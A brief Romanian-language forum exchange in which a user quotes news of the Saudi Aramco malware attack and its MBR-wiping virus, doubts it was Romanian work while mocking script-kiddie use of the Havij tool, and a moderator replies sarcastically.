"Finally, the virus will overwrite the master boot record of the system to prevent it from booting." Nu cred ca erau romani, ai nostri stiu doar ./scan sau Copy/Paste ?id=123 in Havij si apasa pe un buton. "A group named "Cutting Sword of Justice" claimed responsibility for an attack on 30,000 Saudi Aramco workstations" Suna a grupare de romani? Nu mi se pare. Si cred ca e nasol, ca picam de fraieri...

*Moderator

Super, multi baieti "buni" pe acolo.